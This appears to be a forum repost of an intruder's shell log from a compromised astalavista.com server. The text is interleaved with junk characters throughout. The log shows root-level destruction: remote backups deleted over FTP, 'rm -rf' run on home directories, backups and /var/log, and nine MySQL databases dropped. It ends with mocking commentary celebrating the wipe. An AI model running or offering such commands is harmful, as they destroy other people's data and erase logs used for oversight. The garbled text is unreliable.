/ U3 j# S9 q' M) k- q4 f: M-rw-rw-rw- 1 astalavista.com users 88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
# s" a- h' E! Q" K9 W3 I! S-rw-rw-rw- 1 astalavista.com users 26413034040 May 2 00:21 09-05-01-astacom-Public_HTML.tar4 r# `; I6 d9 l
-rw-rw-rw- 1 astalavista.com users 277843549 May 1 17:29 09-05-01-astacom-SQL_Dump.tar1 D8 ]7 \2 C) v' U6 R" P2 a
[snip]! S$ u1 n5 Q6 b& Y8 h3 ^ Q( {
226 Transfer complete.
6 n0 d. r+ X$ {2 Q; Q8 A0 sftp> mdelete *
# K) D6 z( ~3 j: ~: Dftp> ls -la7 j6 n0 ~! |& `
227 Entering Passive Mode (212,254,194,163,2,193)
9 i- K! L: j* w9 X! ~150 Opening BINARY mode data connection for ‘file list’. A2 K% ?! i3 Q6 D
226 Transfer complete.2 b$ u# J ~5 @: U1 T/ Q
ftp>
7 F8 ~1 E- W1 J+ z' a
# N4 m; k( b2 q) t' z. rsh-3.2# cd /home
* F- u" F0 _) k' Jsh-3.2# ls -la B( {7 [, q% y. N
total 120- ]/ E1 S( H+ Q/ q2 b P
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
k) I( F2 `2 b' l4 ddrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
- G3 F( V% r: F P' v- Edrwx–x–x 9 admin admin 4096 Nov 28 2007 admin
9 ^' ]3 _; q4 Q-rw——- 1 root root 8192 Jun 4 03:03 aquota.group3 y+ b+ k; O \
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user0 Y- J4 t- t/ S; S/ W3 |# ~+ B6 `
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
X1 q8 A' ~) a: ddrwxr-xr-x 2 root root 4096 Jul 29 2008 backup5 \) Y) J0 V9 L6 [6 h, F: W9 `- B% R
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141613 w, ]6 }: a! G; ]: @
drwx–x–x 10 com com 4096 Apr 28 12:40 com
7 r4 r* I5 B. _" v8 idrwxr-xr-x 2 root root 4096 May 17 2007 ftp/ E! W7 [, N! z" h9 t8 ~7 P" G
drwx—— 3 jon jon 4096 Sep 21 2007 jon
9 j+ z6 H5 m ^5 M' W: adrwx—— 2 root root 16384 Sep 11 2007 lost+found
' h. O! C& N# c/ ^* A0 q9 F- `drwxr-xr-x 2 root root 4096 Sep 14 2007 my
5 n" v; |8 @* a4 sdrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
( j- p0 H5 v" J1 o, A+ g$ P& E6 Xdrwx—— 2 jon jon 4096 Sep 15 2007 test
2 f/ N: O; d9 o6 d7 v4 m6 |drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp7 z) c3 X7 K9 O5 ?* }2 m
4 v+ j9 X5 X2 n8 I. X" M+ w
sh-3.2# rm -rf backup/5 i3 Z; N6 |; R( c8 D: {
sh-3.2# rm -rf backup.14161/
% S- D2 g9 A7 W! Lsh-3.2# rm -rf ftp/
1 }/ `/ a n4 `) Y7 Tsh-3.2# rm -rf jon/
O: G; J) z! H' G9 Ksh-3.2# rm -rf my/
9 [9 j% d. p3 A0 a# W7 wsh-3.2# rm -rf mysqldata/
0 j( D, u0 L* Vsh-3.2# rm -rf test/9 {, J, |; F7 K" V: A& y. _
sh-3.2# rm -rf tmp/# b0 V! v9 A2 @" \
sh-3.2# cd ~
9 B8 ^" A- g* p! Ksh-3.2# rm -rf *
- T x. |3 d/ I5 U1 r) F- ]1 qsh-3.2# rm -rf /var/log/
/ {* M2 B- R0 @! s. B5 Wrm: cannot remove directory `/var/log//proftpd’: Directory not empty/ \. K2 F C1 u+ d0 b) Z; b
sh-3.2# rm -rf /home/*
) L! o+ N+ }5 y6 ]- e& u; esh-3.2# mysql1 T7 s' F- v. Q1 z! f; H
Welcome to the MySQL monitor. Commands end with ; or \g.
( Q2 I9 g& {; l& N' N. H6 ~Your MySQL connection id is 407156
4 Y: b, T* d# b' M3 h( `/ k; |Server version: 5.0.45-community-log MySQL Community Edition (GPL)+ b5 W# O( `9 n6 H. d ~
/ J5 q3 U) I% c5 b) M) E: K% ]/ lType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer., h5 a! P* A; z# A' k6 e
0 n4 [1 m# h) t# G* X/ V
mysql> show databases;
2 `1 n! r8 h# A0 V8 b: F2 `+———————–+! \# h/ W$ u% }2 {( D' X: @, k6 H# Q
| Database |
9 e# x% ?+ u/ ^: U/ Q+———————–+. C9 E0 q9 m( N% w7 z& L
| information_schema |
- |) T! r9 `% n4 f; M' \| astanet_ads |0 Z9 X6 ?2 e9 P9 A9 c0 w% n2 l
| astanet_mailing_lists |; |+ s5 I4 r6 R/ J" a5 z
| astanet_mediawiki |3 o. P. J& o8 ?" x! Q8 d" |: E) Q
| astanet_membersystem |
0 F/ j- d: P. t. M, Q| com_contrexx |8 B( F- i) V8 D8 h: H0 d6 g; n: W* }
| com_contrexx2 |
& O" P) L( X; d. x7 ?- f| com_contrexx2_live |/ R/ f: C% t4 |! \. O6 U' l
| da_roundcube |! x" r# I/ ^$ r
| dolphin |
/ v0 {0 c5 l: c) r| ideapool |
& L8 O, \* J/ v& [4 ~! }4 K- Y! _4 O| mysql |& q0 X m; a8 L* Y
| test |9 c6 @% q* a: o: f
| yourmaster |
( \. `+ n; s7 M5 m% p" D+———————–+
, ^/ }$ d+ a$ f* [14 rows in set (0.03 sec)" k! _& X) S! m6 A) } Z# K( D
! c# T; Y y6 ?4 W/ E
mysql> drop database astanet_membersystem;
( e" X% D9 R8 _; R }( J% EdroQuery OK, 46 rows affected (0.81 sec)
5 I& k9 u7 V; X9 d/ T' [
; a v% A8 g' ^$ \mysql> drop database com_contrexx;) h: R8 x5 {6 D' l
Query OK, 211 rows affected (2.72 sec)
* s/ Y# T9 O: v1 n' \! B: R w% W' _' B" r1 P
mysql> drop database com_contrexx2;7 l: ?& a$ }" G4 A/ a" {
Query OK, 237 rows affected (2.23 sec)+ v/ }, y2 u: ]0 O6 C* D3 D
6 v( X8 |6 c, `% }3 ~2 V6 ?7 b: A! Wmysql> drop database com_contrexx2_live;- w+ N' P' K/ K' h
Query OK, 227 rows affected (7.63 sec)" P& G+ S+ l; _0 o* l4 y `% a
3 R5 L/ F9 h7 G) P9 G0 G
mysql> drop database ideapool;
6 i& c) B, x: ]) V7 K, }/ S' o1 VQuery OK, 69 rows affected (0.19 sec)
: z8 w2 J4 d6 l/ ^% b. `. T% V3 A0 _% T2 E5 L
mysql> drop database yourmaster;
, X' P6 H6 @6 yQuery OK, 158 rows affected (0.55 sec)- j3 z5 X6 ?# R; x
7 [- x" i( e. n2 \, J0 x: Lmysql> drop database astanet_ads;
. i7 s& X1 l# R5 L* UQuery OK, 9 rows affected (0.11 sec)
) l0 z; j/ z8 D* d# h5 }* y# ?) l7 g4 m1 R( z
mysql> drop database astanet_mailing_lists;
: ?# Y$ A8 D& i& [+ h) NQuery OK, 24 rows affected (1.47 sec)
4 p( ]1 Y+ ]( @$ x3 `4 n8 z9 q: w$ H2 ^5 |8 O+ [9 Z4 R
mysql> drop database astanet_mediawiki;+ o6 y0 T* J- l& b
Query OK, 31 rows affected (0.51 sec)( A* F; d& m' @, }( o# t
$ |; z9 Z2 B/ @ E0 K" M
mysql> show databases;( f/ R: Y8 l( ]# W: T6 F
+——————–+# @$ p) F" k! ?! Z7 x9 W. }: @% e
| Database |
. q2 |+ G1 @& W9 Q) a0 K0 ~+——————–+; J' J8 L8 \1 D' H5 e( y
| information_schema |
! x7 D* |, s- L v4 R* P" u| da_roundcube |* Q4 [& X+ y6 r. ~
| dolphin |& g# g( p, J* t6 [7 ^0 U
| mysql |
) |* x" \* B& a8 n$ I. k$ X| test |
* X+ i# y& Z$ ?4 _8 v7 Q. w7 N3 Q) L; h+——————–+
2 t3 ]. c7 C* C3 b5 rows in set (0.00 sec)
3 Y& e$ d o" m# M7 X: s$ W6 P7 i+ S* ^# b
What a journey! We’re not sure exactly why the “Terminator” had any influence on4 N! O' c1 z: N' a( ~* Z
their naming (conventions) but we’re sure Arnold himself wouldn’t be in the+ }) Z/ z0 ~6 w8 n4 I
wrong to say this pack of morons *wont be back*.5 ?2 Y. t7 p. M: @# D0 z
|
发表于 2012-11-6 21:07:34
收藏
支持
反对